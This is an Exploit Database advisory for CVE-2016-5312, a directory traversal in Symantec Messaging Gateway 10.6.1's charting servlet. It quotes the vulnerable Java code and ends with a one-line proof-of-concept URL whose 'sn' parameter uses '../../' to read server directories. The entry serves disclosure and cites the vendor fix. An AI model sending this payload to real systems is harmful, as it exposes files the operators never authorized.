Symantec Messaging Gateway 10.6.1 – Directory Traversal

• Exploit Database
• 18 阅读

• 作者： R-73eN
  日期： 2016-09-28
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/40437/

• # Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
  # Date : 28/09/2016
  # Author : R-73eN
  # Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
  # Software : https://www.symantec.com/products/threat-protection/messaging-gateway
  # Vendor : Symantec
  # CVE : CVE-2016-5312
  # Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
  # 
  #_________ __
  # |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |
  #| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |
  #| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ 
  # |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|
  #
  #
  # DESCRIPTION:
  #
  # A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. 
  # This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. 
  # This could potentially provide read access to some files/directories on the server for which the user is not authorized.
  #
  The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
  The vulnerable code is
  extends HttpServlet {
  public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
  block6 : {
  try {
  String string = httpServletRequest.getParameter("sn"); 
  //**** Taking parameter "sn" and writing it to the "string variable"
  
  
  if (string == null) break block6;
  String string2 = string.substring(string.length() - 3);
   
  byte[] arrby = (byte[])this.getServletContext().getAttribute(string); 
   
  //**** The string variable is passed here without any sanitanization for directory traversal
  //**** and you can successfully use this to do a directory traversal.
  
  if (arrby != null) {
  httpServletResponse.setContentType("image/" + string2);
  ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
  httpServletResponse.setContentLength(arrby.length);
  servletOutputStream.write(arrby);
  this.getServletContext().removeAttribute(string);
  break block6;
  }
  
  
  POC: 
  https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib